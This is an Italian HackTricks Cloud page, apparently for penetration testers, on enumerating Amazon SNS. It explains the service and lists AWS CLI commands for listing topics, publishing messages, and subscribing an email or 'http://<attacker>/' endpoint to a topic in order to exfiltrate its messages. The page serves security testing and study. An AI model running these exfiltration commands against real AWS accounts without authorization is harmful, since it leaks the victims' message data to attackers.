AWS - SNS Enum

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository su github.

SNS

Amazon Simple Notification Service (Amazon SNS) è descritto come un servizio di messaggistica completamente gestito. Supporta sia la comunicazione applicazione-a-applicazione (A2A) che applicazione-a-persona (A2P).

Le caratteristiche principali per la comunicazione A2A includono i meccanismi di pubblicazione/sottoscrizione (pub/sub). Questi meccanismi introducono i topic, cruciali per abilitare una messaggistica push ad alta velocità, molti-a-molti. Questa funzionalità è altamente vantaggiosa in scenari che coinvolgono sistemi distribuiti, microservizi e architetture serverless basate su eventi. Sfruttando questi topic, i sistemi publisher possono distribuire efficientemente i messaggi a una vasta gamma di sistemi subscriber, facilitando un pattern di messaggistica fanout.

Differenza con SQS

SQS è un servizio basato su code che consente la comunicazione punto-a-punto, garantendo che i messaggi siano elaborati da un singolo consumatore. Offre consegna almeno una volta, supporta code standard e FIFO, e consente la conservazione dei messaggi per i retry e l'elaborazione ritardata. D'altra parte, SNS è un servizio basato su pubblicazione/sottoscrizione, che consente la comunicazione uno-a-molti trasmettendo messaggi a molteplici subscriber simultaneamente. Supporta vari endpoint di sottoscrizione come email, SMS, funzioni Lambda e HTTP/HTTPS, e fornisce meccanismi di filtraggio per la consegna mirata dei messaggi. Mentre entrambi i servizi consentono il disaccoppiamento tra componenti in sistemi distribuiti, SQS si concentra sulla comunicazione in coda, mentre SNS enfatizza i pattern di comunicazione fan-out basati su eventi.

Enumerazione

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Nota che se il topic è di tipo FIFO, solo i sottoscrittori che utilizzano il protocollo SQS possono essere utilizzati (HTTP o HTTPS non possono essere utilizzati).

Inoltre, anche se il --topic-arn contiene la regione, assicurati di specificare la regione corretta in --region o riceverai un errore che sembra indicare che non hai accesso, ma il problema è la regione.